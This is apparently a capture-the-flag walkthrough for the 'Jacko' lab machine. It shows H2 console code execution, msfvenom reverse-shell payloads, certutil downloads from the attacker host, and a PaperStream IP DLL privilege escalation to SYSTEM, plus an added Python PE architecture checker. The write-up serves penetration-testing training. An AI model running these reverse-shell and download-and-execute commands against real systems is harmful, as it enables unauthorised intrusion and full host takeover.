# Jacko

## Information Gathering

`sudo ./nmapAutomator.sh 192.168.209.66 all`

![](https://1575243701-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-Mg-SvuygW2bF4zu7kiy%2Fuploads%2Fdenhw0BDC681eZWf8aFc%2Fimage.png?alt=media\&token=33c83551-03c3-49e2-aff3-63c8e3a71aab)

### Service Enumeration

### HTTP (Port 8082)

![](https://1575243701-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-Mg-SvuygW2bF4zu7kiy%2Fuploads%2Fzi2gM9hABmmhd6hgCupM%2Fimage.png?alt=media\&token=1ef840ab-db0e-4969-84fd-8185d5cf1dcc)

Once logged in, the console banner shows that this is the H2 database console, version 1.4.199. This version has a known code-execution weakness: an authenticated console user can run arbitrary Java from SQL statements, which the exploit below turns into OS command execution via JNI.

![](https://1575243701-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-Mg-SvuygW2bF4zu7kiy%2Fuploads%2FbnPbXCtnxGrMZqHNqMM5%2Fimage.png?alt=media\&token=474119aa-6240-4e1a-92df-f2d86f367152)

## Exploit

{% embed url="<https://www.exploit-db.com/exploits/49384>" %}

After running the exploit's setup statements, we can confirm that command execution works by running `systeminfo` through it and checking that the output comes back in the query result.

![](https://1575243701-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-Mg-SvuygW2bF4zu7kiy%2Fuploads%2FDCJOAkcx5g1rMjoULuLk%2Fimage.png?alt=media\&token=49a14cb8-5d43-456f-a14a-5d37749bf333)

We first generate a reverse-shell payload, `shell.exe`, with msfvenom:

`msfvenom -p windows/x64/shell_reverse_tcp -f exe -o shell.exe LHOST=192.168.49.209 LPORT=8082`

Next, we host `shell.exe` on an HTTP server on the attacking machine and pull it down to the target with `certutil`:

`certutil -urlcache -split -f http://192.168.49.209/home/kali/pg/jacko/shell.exe C:/Windows/Temp/shell.exe`

![](https://1575243701-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-Mg-SvuygW2bF4zu7kiy%2Fuploads%2F8qCovuJDZJESbri4KO7o%2Fimage.png?alt=media\&token=547e004f-1a3b-4d19-9f62-37e133a299ef)

We can then execute `shell.exe` to gain our reverse shell.

`CALL JNIScriptEngine_eval('new java.util.Scanner(java.lang.Runtime.getRuntime().exec("C:/Windows/Temp/shell.exe").getInputStream()).useDelimiter("\Z").next()');`

![](https://1575243701-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-Mg-SvuygW2bF4zu7kiy%2Fuploads%2F8BwwOfQwpgWhXDPjCDkq%2Fimage.png?alt=media\&token=a62b159d-b4e5-451c-afb1-b03dfd54ea65)

The shell comes back with a broken `PATH`, so standard tools such as `whoami` are not found. We reset it first:

`set PATH=%SystemRoot%\system32;%SystemRoot%;`

![](https://1575243701-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-Mg-SvuygW2bF4zu7kiy%2Fuploads%2FjRmaqQumGeXR3uLyg08n%2Fimage.png?alt=media\&token=f4dc8d4a-bac6-48db-8e3f-6afcb9fa5667)

## Privesc

Transferring winPEAS:

`cmd.exe /c certutil -urlcache -split -f http://192.168.49.209:80/opt/PEASS-ng/winPEAS/winPEASexe/binaries/x86/Release/winPEASx86.exe winPEASx86.exe`

Running winPEAS, we see the following.

![](https://1575243701-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-Mg-SvuygW2bF4zu7kiy%2Fuploads%2F3KI7UlSbOwiGHpejMCRT%2Fimage.png?alt=media\&token=2b65975f-b2ad-4e3a-92bd-9e54a419c0e6)

Neither of the two findings winPEAS highlights is exploitable in our case, so we keep enumerating manually.

Listing the `Program Files (x86)` directory, we find `PaperStream IP` installed, which has a known local privilege escalation.

![](https://1575243701-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-Mg-SvuygW2bF4zu7kiy%2Fuploads%2FBQCQ0FN6sG7ZCsd1tAcd%2Fimage.png?alt=media\&token=47539205-e96a-46f0-b5cc-4fb3b2536b38)

{% embed url="<https://www.exploit-db.com/exploits/49382>" %}

We save the PowerShell script from the exploit above as `exploit.ps1` and generate the DLL it plants, `shell.dll`. PaperStream IP lives under `Program Files (x86)`, so the payload is the 32-bit `windows/shell_reverse_tcp`, not the x64 payload used for `shell.exe`:

`msfvenom -p windows/shell_reverse_tcp -f dll -o shell.dll LHOST=192.168.49.209 LPORT=8082`
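A 32-bit process cannot load a 64-bit DLL and vice versa, and a wrong-architecture payload fails silently from the exploit's point of view. As an added example (not part of the original write-up), the check below reads the PE header of a payload before it is transferred and confirms both the machine type and that the file is actually a DLL. `make_stub` builds a constructed minimal PE header purely as offline sample input; the real use is `check_file("shell.dll", "x86", True)`.

```python
import struct

# IMAGE_FILE_HEADER.Machine values from the PE/COFF specification
MACHINE_NAMES = {0x014C: "x86", 0x8664: "x64", 0x01C0: "arm", 0xAA64: "arm64"}
IMAGE_FILE_DLL = 0x2000  # IMAGE_FILE_HEADER.Characteristics flag


def pe_info(data: bytes) -> tuple:
    """Return (arch, is_dll) for a PE image held in memory."""
    if data[:2] != b"MZ":
        raise ValueError("not a PE file: missing MZ header")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("not a PE file: missing PE signature")
    # IMAGE_FILE_HEADER follows the 4-byte signature:
    # Machine(2) NumberOfSections(2) TimeDateStamp(4) PointerToSymbolTable(4)
    # NumberOfSymbols(4) SizeOfOptionalHeader(2) Characteristics(2)
    machine, characteristics = struct.unpack_from("<H16xH", data, e_lfanew + 4)
    arch = MACHINE_NAMES.get(machine, "0x%04x" % machine)
    return arch, bool(characteristics & IMAGE_FILE_DLL)


def check_payload(data: bytes, want_arch: str, want_dll: bool) -> bool:
    """True if the image matches the expected architecture and file type."""
    arch, is_dll = pe_info(data)
    return arch == want_arch and is_dll == want_dll


def check_file(path: str, want_arch: str, want_dll: bool) -> bool:
    """Same check for a file on disk, e.g. check_file("shell.dll", "x86", True)."""
    with open(path, "rb") as f:
        return check_payload(f.read(), want_arch, want_dll)


def make_stub(machine: int, characteristics: int) -> bytes:
    """Constructed minimal PE header (MZ stub, PE signature, file header) that is
    just enough for pe_info(); used only as offline sample input here."""
    e_lfanew = 0x40
    dos = bytearray(e_lfanew)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, e_lfanew)
    file_header = struct.pack("<HHIIIHH", machine, 1, 0, 0, 0, 0xE0, characteristics)
    return bytes(dos) + b"PE\x00\x00" + file_header


if __name__ == "__main__":
    import sys
    # usage: python pecheck.py shell.dll x86 dll   |   python pecheck.py shell.exe x64 exe
    path, arch, kind = sys.argv[1:4]
    ok = check_file(path, arch, kind == "dll")
    print("%s: %s %s -> %s" % (path, *pe_info(open(path, "rb").read()), "OK" if ok else "MISMATCH"))
```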

Next, we transfer both `exploit.ps1` and `shell.dll` to the target machine and start a listener on port 8082.

Once we run `exploit.ps1`, the callback comes in as SYSTEM.

![](https://1575243701-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-Mg-SvuygW2bF4zu7kiy%2Fuploads%2FVh7L1o4WFyCvJySQuk2Y%2Fimage.png?alt=media\&token=5acfae9e-c47b-4de0-a98b-d44aa30acc6c)
